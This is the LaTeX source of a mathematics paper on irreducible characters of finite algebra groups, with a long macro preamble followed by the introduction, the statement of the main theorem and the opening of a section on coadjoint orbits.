\newcommand\calY{{\mathcal{Y}}}
\newcommand\calZ{{\mathcal{Z}}}
\newcommand\bfa{{\mathbf a}}
\newcommand\bfA{{\mathbf A}}
\newcommand\bfb{{\mathbf b}}
\newcommand\bfB{{\mathbf B}}
\newcommand\bfc{{\mathbf c}}
\newcommand\bfC{{\mathbf C}}
\newcommand\bfd{{\mathbf d}}
\newcommand\bfD{{\mathbf D}}
\newcommand\bfe{{\mathbf e}}
\newcommand\bfE{{\mathbf E}}
\newcommand\bff{{\mathbf f}}
\newcommand\bfF{{\mathbf F}}
\newcommand\bfg{{\mathbf g}}
\newcommand\bfG{{\mathbf G}}
\newcommand\bfh{{\mathbf h}}
\newcommand\bfH{{\mathbf H}}
\newcommand\bfi{{\mathbf i}}
\newcommand\bfI{{\mathbf I}}
\newcommand\bfj{{\mathbf j}}
\newcommand\bfJ{{\mathbf J}}
\newcommand\bfk{{\mathbf k}}
\newcommand\bfK{{\mathbf K}}
\newcommand\bfl{{\mathbf l}}
\newcommand\bfL{{\mathbf L}}
\newcommand\bfm{{\mathbf m}}
\newcommand\bfM{{\mathbf M}}
\newcommand\bfn{{\mathbf n}}
\newcommand\bfN{{\mathbf N}}
\newcommand\bfo{{\mathbf o}}
\newcommand\bfO{{\mathbf O}}
\newcommand\bfp{{\mathbf p}}
\newcommand\bfP{{\mathbf P}}
\newcommand\bfq{{\mathbf q}}
\newcommand\bfQ{{\mathbf Q}}
\newcommand\bfr{{\mathbf r}}
\newcommand\bfR{{\mathbf R}}
\newcommand\bfs{{\mathbf s}}
\newcommand\bfS{{\mathbf S}}
\newcommand\bft{{\mathbf t}}
\newcommand\bfT{{\mathbf T}}
\newcommand\bfu{{\mathbf u}}
\newcommand\bfU{{\mathbf U}}
\newcommand\bfv{{\mathbf v}}
\newcommand\bfV{{\mathbf V}}
\newcommand\bfw{{\mathbf w}}
\newcommand\bfW{{\mathbf W}}
\newcommand\bfx{{\mathbf x}}
\newcommand\bfX{{\mathbf X}}
\newcommand\bfy{{\mathbf y}}
\newcommand\bfY{{\mathbf Y}}
\newcommand\bfz{{\mathbf z}}
\newcommand\bfZ{{\mathbf Z}}
\newcommand\bfalp{{\mathbf \alpha}}
\newcommand\bfAlp{{\mathbf \Alpha}}
\newcommand\bfbet{{\mathbf \beta}}
\newcommand\bfgam{{\mathbf \gamma}}
\newcommand\bfGam{{\mathbf \Gamma}}
\newcommand\bfdel{{\mathbf \delta}}
\newcommand\bfDel{{\mathbf \Delta}}
\newcommand\bfeps{{\mathbf \varepsilon}}
\newcommand\bfzet{{\mathbf \zeta}}
\newcommand\bftet{{\mathbf \theta}}
\newcommand\bfTet{{\mathbf \Theta}}
\newcommand\bfiot{{\mathbf \iota}}
\newcommand\bfkap{{\mathbf \kappa}}
\newcommand\bflam{{\mathbf \lambda}}
\newcommand\bfLam{{\mathbf \Lambda}}
\newcommand\bfsig{{\mathbf \sigma}}
\newcommand\bfSig{{\mathbf \Sigma}}
\newcommand\bfvphi{{\mathbf \varphi}}
\newcommand\bfome{{\mathbf \omega}}
\newcommand\bfOme{{\mathbf \Omega}}
\renewcommand\AA{\mathbb{A}}
\newcommand\BB{\mathbb{B}}
\newcommand\CC{\mathbb{C}}
\newcommand\DD{\mathbb{D}}
\newcommand\EE{\mathbb{E}}
\newcommand\FF{\mathbb{F}}
\newcommand\GG{\mathbb{G}}
\newcommand\HH{\mathbb{H}}
\newcommand\II{\mathbb{I}}
\newcommand\JJ{\mathbb{J}}
\newcommand\KK{\mathbb{K}}
\newcommand\LL{\mathbb{L}}
\newcommand\MM{\mathbb{M}}
\newcommand\NN{\mathbb{N}}
\newcommand\OO{\mathbb{O}}
\newcommand\PP{\mathbb{P}}
\newcommand\QQ{\mathbb{Q}}
\newcommand\RR{\mathbb{R}}
\renewcommand\SS{\mathbb{S}}
\newcommand\TT{\mathbb{T}}
\newcommand\UU{\mathbb{U}}
\newcommand\VV{\mathbb{V}}
\newcommand\WW{\mathbb{W}}
\newcommand\XX{\mathbb{X}}
\newcommand\YY{\mathbb{Y}}
\newcommand\ZZ{\mathbb{Z}}
\newcommand\frA{{\mathfrak{A}}}
\newcommand\fra{{\mathfrak{a}}}
\newcommand\frB{{\mathfrak{B}}}
\newcommand\frb{{\mathfrak{b}}}
\newcommand\frC{{\mathfrak{C}}}
\newcommand\frc{{\mathfrak{c}}}
\newcommand\frD{{\mathfrak{D}}}
\newcommand\frd{{\mathfrak{d}}}
\newcommand\frE{{\mathfrak{E}}}
\newcommand\fre{{\mathfrak{e}}}
\newcommand\frF{{\mathfrak{F}}}
\newcommand\frf{{\mathfrak{f}}}
\newcommand\frG{{\mathfrak{G}}}
\newcommand\frg{{\mathfrak{g}}}
\newcommand\frH{{\mathfrak{H}}}
\newcommand\frh{{\mathfrak{h}}}
\newcommand\frI{{\mathfrak{I}}}
\newcommand\fri{{\mathfrak{i}}}
\newcommand\frJ{{\mathfrak{J}}}
\newcommand\frj{{\mathfrak{j}}}
\newcommand\frK{{\mathfrak{K}}}
\newcommand\frk{{\mathfrak{k}}}
\newcommand\frL{{\mathfrak{L}}}
\newcommand\frl{{\mathfrak{l}}}
\newcommand\frM{{\mathfrak{M}}}
\newcommand\frm{{\mathfrak{m}}}
\newcommand\frN{{\mathfrak{N}}}
\newcommand\frn{{\mathfrak{n}}}
\newcommand\frO{{\mathfrak{O}}}
\newcommand\fro{{\mathfrak{o}}}
\newcommand\frP{{\mathfrak{P}}}
\newcommand\frp{{\mathfrak{p}}}
\newcommand\frQ{{\mathfrak{Q}}}
\newcommand\frq{{\mathfrak{q}}}
\newcommand\frR{{\mathfrak{R}}}
\newcommand\frr{{\mathfrak{r}}}
\newcommand\frS{{\mathfrak{S}}}
\newcommand\frs{{\mathfrak{s}}}
\newcommand\frT{{\mathfrak{T}}}
\newcommand\frt{{\mathfrak{t}}}
\newcommand\frU{{\mathfrak{U}}}
\newcommand\fru{{\mathfrak{u}}}
\newcommand\frV{{\mathfrak{V}}}
\newcommand\frv{{\mathfrak{v}}}
\newcommand\frW{{\mathfrak{W}}}
\newcommand\frw{{\mathfrak{w}}}
\newcommand\frX{{\mathfrak{X}}}
\newcommand\frx{{\mathfrak{x}}}
\newcommand\frY{{\mathfrak{Y}}}
\newcommand\fry{{\mathfrak{y}}}
\newcommand\frZ{{\mathfrak{Z}}}
\newcommand\frz{{\mathfrak{z}}}
\newcommand\oa{{\overline{a}}}
\newcommand\oA{{\overline{A}}}
\newcommand\ob{{\overline{b}}}
\newcommand\oB{{\overline{B}}}
\newcommand\oc{{\overline{c}}}
\newcommand\oC{{\overline{C}}}
\newcommand\oD{{\overline{D}}}
\newcommand\od{{\overline{d}}}
\newcommand\oE{{\overline{E}}}
\renewcommand\oe{{\overline{e}}}
\newcommand\of{{\overline{f}}}
\newcommand\oF{{\overline{F}}}
\newcommand\og{{\overline{g}}}
\newcommand\oG{{\overline{G}}}
\newcommand\oh{{\overline{h}}}
\newcommand\oH{{\overline{H}}}
\newcommand\oI{{\overline{I}}}
\newcommand\oj{{\overline{j}}}
\newcommand\oJ{{\overline{J}}}
\newcommand\ok{{\overline{k}}}
\newcommand\oK{{\overline{K}}}
\newcommand\oL{{\overline{L}}}
\newcommand\om{{\overline{m}}}
\newcommand\oM{{\overline{M}}}
\newcommand\oN{{\overline{N}}}
\newcommand\oO{{\overline{O}}}
\newcommand\oo{{\overline{o}}}
\newcommand\op{{\overline{p}}}
\newcommand\oP{{\overline{P}}}
\newcommand\oq{{\overline{q}}}
\newcommand\oQ{{\overline{Q}}}
\newcommand\OR{{\overline{r}}}
\newcommand\oS{{\overline{S}}}
\newcommand\os{{\overline{s}}}
\newcommand\ot{{\overline{t}}}
\newcommand\oT{{\overline{T}}}
\newcommand\ou{{\overline{u}}}
\newcommand\oU{{\overline{U}}}
\newcommand\ov{{\overline{v}}}
\newcommand\oV{{\overline{V}}}
\newcommand\ow{{\overline{w}}}
\newcommand\oW{{\overline{W}}}
\newcommand\ox{{\overline{x}}}
\newcommand\oX{{\overline{X}}}
\newcommand\oy{{\overline{y}}}
\newcommand\oY{{\overline{Y}}}
\newcommand\oz{{\overline{z}}}
\newcommand\oZ{{\overline{Z}}}
\newcommand\oalp{{\overline{\alpha}}}
\newcommand\obet{{\overline{\bet}}}
\newcommand\odel{{\overline{\del}}}
\newcommand\oDel{{\overline{\Del}}}
\newcommand\ocup{{\overline{\cup}}}
\newcommand\ovarphi{{\overline{\varphi}}}
\newcommand\ochi{{\overline{\chi}}}
\newcommand\oeps{{\overline{\eps}}}
\newcommand\oeta{{\overline{\eta}}}
\newcommand\ogam{{\overline{\gam}}}
\newcommand\okap{{\overline{\kap}}}
\newcommand\olam{{\overline{\lambda}}}
\newcommand\oLam{{\overline{\Lambda}}}
\newcommand\omu{{\overline{\mu}}}
\newcommand\onu{{\overline{\nu}}}
\newcommand\oOme{{\overline{\Ome}}}
\newcommand\ophi{\overline{\phi}}
\newcommand\oPhi{{\overline{\Phi}}}
\newcommand\opi{{\overline{\pi}}}
\newcommand\oPsi{{\overline{\Psi}}}
\newcommand\opsi{{\overline{\psi}}}
\newcommand\orho{{\overline{\rho}}}
\newcommand\osig{{\overline{\sig}}}
\newcommand\otau{{\overline{\tau}}}
\newcommand\otet{{\overline{\theta}}}
\newcommand\oxi{{\overline{\xi}}}
\newcommand\oome{\overline{\ome}}
\newcommand\opart{{\overline{\partial}}}
\newcommand\ua{{\underline{a}}}
\newcommand\uA{{\underline{A}}}
\newcommand\ub{{\underline{b}}}
\newcommand\uB{{\underline{B}}}
\newcommand\uc{{\underline{c}}}
\newcommand\uC{{\underline{C}}}
\newcommand\ud{{\underline{d}}}
\newcommand\uD{{\underline{D}}}
\newcommand\ue{{\underline{e}}}
\newcommand\uE{{\underline{E}}}
\newcommand\uf{{\underline{f}}}
\newcommand\uF{{\underline{F}}}
\newcommand\ug{{\underline{g}}}
\newcommand\uG{{\underline{G}}}
\newcommand\uh{{\underline{h}}}
\newcommand\uH{{\underline{H}}}
\newcommand\ui{{\underline{i}}}
\newcommand\uI{{\underline{I}}}
\newcommand\uj{{\underline{j}}}
\newcommand\uJ{{\underline{J}}}
\newcommand\uk{{\underline{k}}}
\newcommand\uK{{\underline{K}}}
\newcommand\ul{{\underline{l}}}
\newcommand\uL{{\underline{L}}}
\newcommand\um{{\underline{m}}}
\newcommand\uM{{\underline{M}}}
\newcommand\un{{\underline{n}}}
\newcommand\uN{{\underline{N}}}
\newcommand\uo{{\underline{o}}}
\newcommand\uO{{\underline{O}}}
\newcommand\up{{\underline{p}}}
\newcommand\uP{{\underline{P}}}
\newcommand\uq{{\underline{q}}}
\newcommand\uQ{{\underline{Q}}}
\newcommand\ur{{\underline{r}}}
\newcommand\uR{{\underline{R}}}
\newcommand\us{{\underline{s}}}
\newcommand\uS{{\underline{S}}}
\newcommand\ut{{\underline{t}}}
\newcommand\uT{{\underline{T}}}
\newcommand\uu{{\underline{u}}}
\newcommand\uU{{\underline{U}}}
\newcommand\uv{{\underline{v}}}
\newcommand\uV{{\underline{V}}}
\newcommand\uw{{\underline{w}}}
\newcommand\uW{{\underline{W}}}
\newcommand\ux{{\underline{x}}}
\newcommand\uX{{\underline{X}}}
\newcommand\uy{{\underline{y}}}
\newcommand\uY{{\underline{Y}}}
\newcommand\uz{{\underline{z}}}
\newcommand\uZ{{\underline{Z}}}
\newcommand\ualp{{\underline{\alp}}}
\newcommand\ubet{{\underline{\bet}}}
\newcommand\uchi{{\underline{\chi}}}
\newcommand\udel{{\underline{\del}}}
\newcommand\uell{{\underline{\ell}}}
\newcommand\ueps{{\underline{\eps}}}
\newcommand\ueta{{\underline{\eta}}}
\newcommand\uGam{{\underline{\Gamma}}}
\newcommand\unu{{\underline{\nu}}}
\newcommand\uome{{\underline{\omega}}}
\newcommand\utet{{\underline{\tet}}}
\newcommand\ulam{{\underline{\lam}}}
\newcommand\hata{{\widehat{a}}}
\newcommand\hatA{{\widehat{A}}}
\newcommand\hatb{{\widehat{b}}}
\newcommand\hatB{{\widehat{B}}}
\newcommand\hatc{{\widehat{c}}}
\newcommand\hatC{{\widehat{C}}}
\newcommand\hatd{{\widehat{d}}}
\newcommand\hatD{{\widehat{D}}}
\newcommand\hate{{\widehat{e}}}
\newcommand\hatE{{\widehat{E}}}
\newcommand\hatf{{\widehat{f}}}
\newcommand\hatF{{\widehat{F}}}
\newcommand\hatg{{\widehat{g}}}
\newcommand\hatG{{\widehat{G}}}
\newcommand\hath{{\widehat{h}}}
\newcommand\hatH{{\widehat{H}}}
\newcommand\hati{{\widehat{i}}}
\newcommand\hatI{{\widehat{I}}}
\newcommand\hatj{{\widehat{j}}}
\newcommand\hatJ{{\widehat{J}}}
\newcommand\hatk{{\widehat{k}}}
\newcommand\hatK{{\widehat{K}}}
\newcommand\hatl{{\widehat{l}}}
\newcommand\hatL{{\widehat{L}}}
\newcommand\hatm{{\widehat{m}}}
\newcommand\hatM{{\widehat{M}}}
\newcommand\hatn{{\widehat{n}}}
\newcommand\hatN{{\widehat{N}}}
\newcommand\hato{{\widehat{o}}}
\newcommand\hatO{{\widehat{O}}}
\newcommand\hatp{{\widehat{p}}}
\newcommand\hatP{{\widehat{P}}}
\newcommand\hatq{{\widehat{q}}}
\newcommand\hatQ{{\widehat{Q}}}
\newcommand\hatr{{\widehat{r}}}
\newcommand\hatR{{\widehat{R}}}
\newcommand\hats{{\widehat{s}}}
\newcommand\hatS{{\widehat{S}}}
\newcommand\hatt{{\widehat{t}}}
\newcommand\hatT{{\widehat{T}}}
\newcommand\hatu{{\widehat{u}}}
\newcommand\hatU{{\widehat{U}}}
\newcommand\hatv{{\widehat{v}}}
\newcommand\hatV{{\widehat{V}}}
\newcommand\hatw{{\widehat{w}}}
\newcommand\hatW{{\widehat{W}}}
\newcommand\hatx{{\widehat{x}}}
\newcommand\hatX{{\widehat{X}}}
\newcommand\haty{{\widehat{y}}}
\newcommand\hatY{{\widehat{Y}}}
\newcommand\hatz{{\widehat{z}}}
\newcommand\hatZ{{\widehat{Z}}}
\newcommand\hatalp{{\widehat{\alpha}}}
\newcommand\hatdel{{\widehat{\delta}}}
\newcommand\hatDel{{\widehat{\Delta}}}
\newcommand\hatbet{{\widehat{\beta}}}
\newcommand\hateps{{\hat{\eps}}}
\newcommand\hatgam{{\widehat{\gamma}}}
\newcommand\hatGam{{\widehat{\Gamma}}}
\newcommand\hatlam{{\widehat{\lambda}}}
\newcommand\hatmu{{\widehat{\mu}}}
\newcommand\hatnu{{\widehat{\nu}}}
\newcommand\hatOme{{\widehat{\Ome}}}
\newcommand\hatphi{{\widehat{\phi}}}
\newcommand\hatPhi{{\widehat{\Phi}}}
\newcommand\hatpi{{\widehat{\pi}}}
\newcommand\hatpsi{{\widehat{\psi}}}
\newcommand\hatPsi{{\widehat{\Psi}}}
\newcommand\hatrho{{\widehat{\rho}}}
\newcommand\hatsig{{\widehat{\sig}}}
\newcommand\hatSig{{\widehat{\Sig}}}
\newcommand\hattau{{\widehat{\tau}}}
\newcommand\hattet{{\widehat{\theta}}}
\newcommand\hatvarphi{{\widehat{\varphi}}}
\newcommand\hatAA{{\widehat{\AA}}}
\newcommand\hatBB{{\widehat{\BB}}}
\newcommand\hatCC{{\widehat{\CC}}}
\newcommand\hatDD{{\widehat{\DD}}}
\newcommand\hatEE{{\widehat{\EE}}}
\newcommand\hatFF{{\widehat{\FF}}}
\newcommand\hatGG{{\widehat{\GG}}}
\newcommand\hatHH{{\widehat{\HH}}}
\newcommand\hatII{{\widehat{\II}}}
\newcommand\hatJJ{{\widehat{\JJ}}}
\newcommand\hatKK{{\widehat{\KK}}}
\newcommand\hatLL{{\widehat{\LL}}}
\newcommand\hatMM{{\widehat{\MM}}}
\newcommand\hatNN{{\widehat{\NN}}}
\newcommand\hatOO{{\widehat{\OO}}}
\newcommand\hatPP{{\widehat{\PP}}}
\newcommand\hatQQ{{\widehat{\QQ}}}
\newcommand\hatRR{{\widehat{\RR}}}
\newcommand\hatSS{{\widehat{\SS}}}
\newcommand\hatTT{{\widehat{\TT}}}
\newcommand\hatUU{{\widehat{\UU}}}
\newcommand\hatVV{{\widehat{\VV}}}
\newcommand\hatWW{{\widehat{\WW}}}
\newcommand\hatXX{{\widehat{\XX}}}
\newcommand\hatYY{{\widehat{\YY}}}
\newcommand\hatZZ{{\widehat{\ZZ}}}
\newcommand\tila{{\widetilde{a}}}
\newcommand\tilA{{\widetilde{A}}}
\newcommand\tilb{{\widetilde{b}}}
\newcommand\tilB{{\widetilde{B}}}
\newcommand\tilc{{\widetilde{c}}}
\newcommand\tilC{{\widetilde{C}}}
\newcommand\tild{{\widetilde{d}}}
\newcommand\tilD{{\widetilde{D}}}
\newcommand\tile{{\widetilde{e}}}
\newcommand\tilE{{\widetilde{E}}}
\newcommand\tilf{{\widetilde{f}}}
\newcommand\tilF{{\widetilde{F}}}
\newcommand\tilg{{\widetilde{g}}}
\newcommand\tilG{{\widetilde{G}}}
\newcommand\tilh{{\widetilde{h}}}
\newcommand\tilH{{\widetilde{H}}}
\newcommand\tili{{\widetilde{i}}}
\newcommand\tilI{{\widetilde{I}}}
\newcommand\tilj{{\widetilde{j}}}
\newcommand\tilJ{{\widetilde{J}}}
\newcommand\tilk{{\widetilde{k}}}
\newcommand\tilK{{\widetilde{K}}}
\newcommand\till{{\widetilde{l}}}
\newcommand\tilL{{\widetilde{L}}}
\newcommand\tilm{{\widetilde{m}}}
\newcommand\tilM{{\widetilde{M}}}
\newcommand\tiln{{\widetilde{n}}}
\newcommand\tilN{{\widetilde{N}}}
\newcommand\tilo{{\widetilde{o}}}
\newcommand\tilO{{\widetilde{O}}}
\newcommand\tilp{{\widetilde{p}}}
\newcommand\tilP{{\widetilde{P}}}
\newcommand\tilq{{\widetilde{q}}}
\newcommand\tilQ{{\widetilde{Q}}}
\newcommand\tilr{{\widetilde{r}}}
\newcommand\tilR{{\widetilde{R}}}
\newcommand\tils{{\widetilde{s}}}
\newcommand\tilS{{\widetilde{S}}}
\newcommand\tilt{{\widetilde{t}}}
\newcommand\tilT{{\widetilde{T}}}
\newcommand\tilu{{\widetilde{u}}}
\newcommand\tilU{{\widetilde{U}}}
\newcommand\tilv{{\widetilde{v}}}
\newcommand\tilV{{\widetilde{V}}}
\newcommand\tilw{{\widetilde{w}}}
\newcommand\tilW{{\widetilde{W}}}
\newcommand\tilx{{\widetilde{x}}}
\newcommand\tilX{{\widetilde{X}}}
\newcommand\tily{{\widetilde{y}}}
\newcommand\tilY{{\widetilde{Y}}}
\newcommand\tilz{{\widetilde{z}}}
\newcommand\tilZ{{\widetilde{Z}}}
\newcommand\tilalp{{\widetilde{\alpha}}}
\newcommand\tilbet{{\widetilde{\beta}}}
\newcommand\tildel{{\widetilde{\delta}}}
\newcommand\tilDel{{\widetilde{\Delta}}}
\newcommand\tilchi{{\widetilde{\chi}}}
\newcommand\tileta{{\widetilde{\eta}}}
\newcommand\tilgam{{\widetilde{\gamma}}}
\newcommand\tilGam{{\widetilde{\Gamma}}}
\newcommand\tilome{{\widetilde{\ome}}}
\newcommand\tillam{{\widetilde{\lam}}}
\newcommand\tilmu{{\widetilde{\mu}}}
\newcommand\tilphi{{\widetilde{\phi}}}
\newcommand\tilpi{{\widetilde{\pi}}}
\newcommand\tilpsi{{\widetilde{\psi}}}
\renewcommand\tilome{{\widetilde{\ome}}}
\newcommand\tilOme{{\widetilde{\Ome}}}
\newcommand\tilPhi{{\widetilde{\Phi}}}
\newcommand\tilQQ{{\widetilde{\QQ}}}
\newcommand\tilrho{{\widetilde{\rho}}}
\newcommand\tilsig{{\widetilde{\sig}}}
\newcommand\tiltau{{\widetilde{\tau}}}
\newcommand\tiltet{{\widetilde{\theta}}}
\newcommand\tilvarphi{{\widetilde{\varphi}}}
\newcommand\tilxi{{\widetilde{\xi}}}
\newcommand\dta{{\dot{a}}}
\newcommand\dtA{{\dot{A}}}
\newcommand\dtb{{\dot{b}}}
\newcommand\dtB{{\dot{B}}}
\newcommand\dtc{{\dot{c}}}
\newcommand\dtC{{\dot{C}}}
\newcommand\dtd{{\dot{d}}}
\newcommand\dtD{{\dot{D}}}
\newcommand\dte{{\dot{e}}}
\newcommand\dtE{{\dot{E}}}
\newcommand\dtf{{\dot{f}}}
\newcommand\dtF{{\dot{F}}}
\newcommand\dtg{{\dot{g}}}
\newcommand\dtG{{\dot{G}}}
\newcommand\dth{{\dot{h}}}
\newcommand\dtH{{\dot{H}}}
\newcommand\dti{{\dot{i}}}
\newcommand\dtI{{\dot{I}}}
\newcommand\dtj{{\dot{j}}}
\newcommand\dtJ{{\dot{J}}}
\newcommand\dtk{{\dot{k}}}
\newcommand\dtK{{\dot{K}}}
\newcommand\dtl{{\dot{l}}}
\newcommand\dtL{{\dot{L}}}
\newcommand\dtm{{\dot{m}}}
\newcommand\dtM{{\dot{M}}}
\newcommand\dtn{{\dot{n}}}
\newcommand\dtN{{\dot{N}}}
\newcommand\dto{{\dot{o}}}
\newcommand\dtO{{\dot{O}}}
\newcommand\dtp{{\dot{p}}}
\newcommand\dtP{{\dot{P}}}
\newcommand\dtq{{\dot{q}}}
\newcommand\dtQ{{\dot{Q}}}
\newcommand\dtr{{\dot{r}}}
\newcommand\dtR{{\dot{R}}}
\newcommand\dts{{\dot{s}}}
\newcommand\dtS{{\dot{S}}}
\newcommand\dtt{{\dot{t}}}
\newcommand\dtT{{\dot{T}}}
\newcommand\dtu{{\dot{u}}}
\newcommand\dtU{{\dot{U}}}
\newcommand\dtv{{\dot{v}}}
\newcommand\dtV{{\dot{V}}}
\newcommand\dtw{{\dot{w}}}
\newcommand\dtW{{\dot{W}}}
\newcommand\dtx{{\dot{x}}}
\newcommand\dtX{{\dot{X}}}
\newcommand\dty{{\dot{y}}}
\newcommand\dtY{{\dot{Y}}}
\newcommand\dtz{{\dot{z}}}
\newcommand\dtZ{{\dot{Z}}}
\newcommand\rank{\operatorname{rank}}
\newcommand\irr{\operatorname{Irr}}
\renewcommand{\hom}{\operatorname{Hom}}
\newcommand{\operatorname{cf}}{\operatorname{cf}}
\newcommand{\operatorname{Rad}}{\operatorname{Rad}}
\newcommand{\operatorname{tr}}{\operatorname{tr}}
\newcommand{\operatorname{char}}{\operatorname{char}}
\newcommand{\left\{}{\left\{}
\newcommand{\right\}}{\right\}}
\newcommand{\left(}{\left(}
\newcommand{\right)}{\right)}
\newcommand{\left[}{\left[}
\newcommand{\right]}{\right]}
\newcommand{\left\langle}{\left\langle}
\newcommand{\right\rangle}{\right\rangle}
\renewcommand{\lvert}{\left|}
\renewcommand{\rvert}{\right|}
\newcommand{\rightarrow}{\rightarrow}
\newcommand{\mathbb{F}_{q}}{\mathbb{F}_{q}}
\newcommand{^{-1}}{^{-1}}
\newcommand{\times}{\times}
\newcommand{\+}{\oplus}
\newcommand{\bas}[2]{\left( {#1}_{1}, \ldots, {#1}_{#2} \right)}
\newcommand{\seq}[2]{{#1}_{1}, \ldots, {#1}_{#2}}
\newcommand{\text{ for all }}{\text{ for all }}
\newcommand{^{\prime}}{^{\prime}}
\newcommand{\subseteq}{\subseteq}
\newcommand\dsty[1]{{\displaystyle #1}}
\newcommand{\begin{cases}}{\begin{cases}}
\newcommand{\end{cases}}{\end{cases}}
\newcommand{\al}[1]{\item[{\rm (#1)}]}
\newcommand{i.e., }{i.e., }
\newcommand{\begin{bmatrix}}{\begin{bmatrix}}
\newcommand{\end{bmatrix}}{\end{bmatrix}}
\newcommand{\left[ \begin{smallmatrix}}{\left[ \begin{smallmatrix}}
\newcommand{\end{smallmatrix} \right]}{\end{smallmatrix} \right]}
\newcommand{\bigcup}{\bigcup}
\newcommand{\colon}{\colon}
\newcommand{\calO}{\calO}
\newcommand{\bfOme}{\bfOme}
\newcommand{\supseteq}{\supseteq}
\newcommand{\ord}[1]{\lvert #1 \rvert}
\newcommand{\overline}{\overline}
\newcommand{\imp}[2]{\text{(#1)} \Rightarrow \text{(#2)}}
\newcommand{\impd}[2]{\text{(#1)} \Leftrightarrow \text{(#2)}}
\newcommand{Sp_{2n}(q)}{Sp_{2n}(q)}
\newcommand{\gl}[1]{\mathfrak{gl}_{#1}(q)}
\newcommand{U_{n}(q)}{U_{n}(q)}
\newcommand{^{-tr}}{^{-tr}}
\newcommand{^{tr}}{^{tr}}
\newcommand{\apl}[3]{#1 \colon #2 \rightarrow #3}
\newcommand{\symat}[2]{\begin{bmatrix} #1 & 0 \\ #2 #1 & #1^{-tr} \end{bmatrix}}
\newcommand{\isymat}[2]{\begin{bmatrix} #1^{-1} & 0 \\ -x^{tr} a & #1^{tr} \end{bmatrix}}
\newcommand{\nsymat}[2]{\begin{bmatrix} #1 & 0 \\ #2 & -#1^{tr} \end{bmatrix}}
\newcommand{\fru_{n}(q)}{\fru_{n}(q)}
\newcommand{\frb_{n}(q)}{\frb_{n}(q)}
\newcommand{\frt_{n}(q)}{\frt_{n}(q)}
\newcommand{\dmat}[2]{\begin{bmatrix} #1 & 0 \\ 0 & #2 \end{bmatrix}}
\newcommand{^{\perp}}{^{\perp}}
\newcommand{\ltimes}{\ltimes}
\ShowLabelsfals
\begin{document}
\title[Irreducible characters of finite algebra groups]{Irreducible
characters of finite algebra groups}
\author[C.~A.~M.~Andr\'e]{Carlos A. M. Andr\'e}
\thanks{This research was carried out as part of the PRAXIS XXI
Project 2/2.1/MAT/73/94.}
\address{Departamento de Matem\'atica, Faculdade de Ci\^encias da
Universidade de Lisboa, Rua Ernesto de Vasconcelos, Bloco C1, Piso 3,
1700 LISBOA, PORTUGAL}
\email{candre@fc.ul.pt}
\maketitle
\sec{intro}{Introduction}
Let $p$ be a prime number, let $q = p^{e}$ ($e \geq 1$) be a power of
$p$ and let $\mathbb{F}_{q}$ denote the finite field with $q$ elements. Let $A$ be
a finite dimensional $\mathbb{F}_{q}$-algebra. (Throughout the paper, all algebras
are supposed to have an identity element). Let $J = J(A)$ be the Jacobson
radical of $A$ and let $$G = 1+J = \left\{ 1+a \colon a \in A \right\}.$$
Then $G$ is a $p$-subgroup of the group of units of $A$. Following
\cite{isaacs1}, we refer to a group arising in this way as an {\bf
$\mathbb{F}_{q}$-algebra group}. As an example, let $J = \fru_{n}(q)$ be the
$\mathbb{F}_{q}$-space consisting of all nilpotent uppertriangular $n \times n$
matrices over $\mathbb{F}_{q}$. Then $J$ is the Jacobson radical of the
$\mathbb{F}_{q}$-algebra $A = \mathbb{F}_{q} \cdot 1 + J$ and the $p$-group $G = 1+J$ is the
group $U_{n}(q)$ consisting of all unipotent uppertriangular $n
\times n$ matrices over $\mathbb{F}_{q}$.
A subgroup $H$ of an $\mathbb{F}_{q}$-algebra group $G$ is said to be an {\bf
algebra subgroup} of $G$ if $H = 1+U$ for some multiplicatively closed
$\mathbb{F}_{q}$-subspace $U$ of $J$. It is clear that an algebra subgroup of $G$
is itself an $\mathbb{F}_{q}$-algebra group and that it has $q$-power index in $G$.
The main purpose of this paper is to proof the following result.
(Throughout this paper, all characters are taken over the complex
field.)
\th{main}
Let $G$ be an $\mathbb{F}_{q}$-algebra group and let $\chi$ be an irreducible
character of $G$. Then there exist an algebra subgroup $H$ of $G$ and
a linear character $\lam$ of $H$ such that $\chi = \lam^{G}$.
\eth
As a consequence, we obtain Theorem~A of \cite{isaacs1} (see also
\cite[Theorem[26.7]{huppert}) which asserts
that all irreducible characters of an (arbitrary) $\mathbb{F}_{q}$-algebra group
have $q$-power degree. (However, this result will used in the proof of
\reft{main}.) Following the terminology of \cite{isaacs1}, we say that
a finite group $G$ is a {\it $q$-power-degree group} if every
irreducible character of $G$ has $q$-power degree. Hence,
\cite[Theorem~A]{isaacs1} asserts that every $\mathbb{F}_{q}$-algebra group is a
$q$-power-degree group. In particular, the unitriangular group $U_{n}(q)$
is a $q$-power-degree group (which is precisely the statement of
\cite[Corollary~B]{isaacs1}). On the other hand, our \reft{main} generalizes
Theorem~C of \cite{isaacs1} and answers the question made by I.~M.~Isaacs
immediately before that theorem. We note, moreover, that the statement
of our \reft{main} is precisely the assertion made by E.~A.~Gutkin in
\cite{gutkin}. The argument used by Gutkin to prove this assertion was
defective and a counterexample was given by Isaacs to illustrate its flaw
(see Section~10 of \cite{isaacs1}).
A result similar to our \reft{main} was proved by D.~Kazhdan for the
group $G = U_{n}(q)$ in the case where $p \geq n$. Kazhdan's result appears
in the paper \cite{kazhdan} (see also \cite[Theorem~7.7]{srinivasan}) and
applies to other finite unipotent algebraic groups. However, Kazhdan imposes
a restriction on the prime $p$ in order to use the exponential map.
In this paper, we replace the exponential map by the bijection $J
\rightarrow 1+J$ defined by the (natural) correspondence $a \mapsto
1+a$. Then we follow Kazhdan's idea and we use Kirillov's method of
coadjoint orbits (see, for example, \cite{kirillov1}) to parametrize
the irreducible characters of the $\mathbb{F}_{q}$-algebra group $G = 1+J$.
\sec{class}{Class functions associated with coadjoint orbits}
Let $J = J(A)$, where $A$ is a finite dimensional $\mathbb{F}_{q}$-algebra, and
let $G = 1+J$. Let $J^{*} = \hom_{\mathbb{F}_{q}}(J, \mathbb{F}_{q})$ be the dual space of
$J$ and let $\psi$ be an arbitrary non-trivial linear character of
the additive group ${\mathbb{F}_{q}}^{+}$ of the field $\mathbb{F}_{q}$. For each $f \in
J^{*}$, let $\psi_{f} \colon J \rightarrow \CC$ be the map defined by
\eq{psi}
\psi_{f}(a) = \psi(f(a))
\end{equation}
for all $a \in J$. Then $\psi_{f}$ is a linear character of the additive
group $J^{+}$ of $J$ and, in fact,
\eq{irrJ}
\irr(J^{+}) = \left\{ \psi_{f} \colon f \in J^{*} \right\}.
\end{equation}
(For any finite group $X$, we denote by $\irr(X)$ the set of all
irreducible characters of $X$.)
